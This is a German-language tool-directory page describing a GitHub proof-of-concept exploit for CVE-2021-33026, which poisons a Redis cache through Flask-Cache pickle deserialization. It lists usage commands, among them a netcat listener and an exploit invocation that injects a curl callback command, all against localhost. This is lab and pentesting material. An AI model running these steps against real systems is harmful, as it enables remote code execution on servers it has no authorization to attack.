Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
FlaskCache_CVE-2021-33026_POC — Proof-of-Concept-Exploit für CVE-2021-33026, das Redis-Cache-Vergiftung in Flask-Cache mittels Pickle-Deserialisierung demonstriert, um Remote-Code-Ausführung zu erreichen. | Kitploit
Tools/GitHubGitHub/agilevatester/flaskcache_cve-2021-33026_poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubagilevatester/flaskcache_cve-2021-33026_poc

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

FlaskCache_CVE-2021-33026_POC

Proof-of-Concept-Exploit für CVE-2021-33026, das Redis-Cache-Vergiftung in Flask-Cache mittels Pickle-Deserialisierung demonstriert, um Remote-Code-Ausführung zu erreichen.

Repository anzeigen
1vor 7 MonatenNoch nicht geprüft

Pickle-Serialisierung Remote-Codeausführung - Redis Poisoning PoC Exploit


Überprüfen, ob der Redis-Server läuft

redis-cli -h 127.0.0.1 -p 6379 ping

redis-cli keys *

redis-cli get [Keyid]


Netcat auf Port 10001 starten und lauschen:

nc -nvlp 10001


Umgebungen für Flask Chache einrichten

python -m venv venv_flask_cache_<lib_ver>

source venv_flask_cache_<lib_ver>\scripts\activate

pip install -r <requirement.txt>

Umgebungen für Flask Chache 2.3.0 einrichten

Flask-App ausführen und Cache-Key erstellen:

flask run

curl --header "Content-Type: application/json" --request POST --data {"key":"Cachelib_2.3"} http://localhost:5000/cache/new

Cache-Key-Wert von der Flask-App abrufen

curl --request GET http://localhost:5000/cache/[key]

Ausnutzen des Flask-Cache durch Vergiften des Redis-Cache:

cve-2021-33026_PoC.py --rhost 127.0.0.1 --rport 5000 --cacheType redis --cmd "curl http://localhost:10001" --id 41685a90-434e-4d70-9a08-35b78025e09a

Tool herunterladen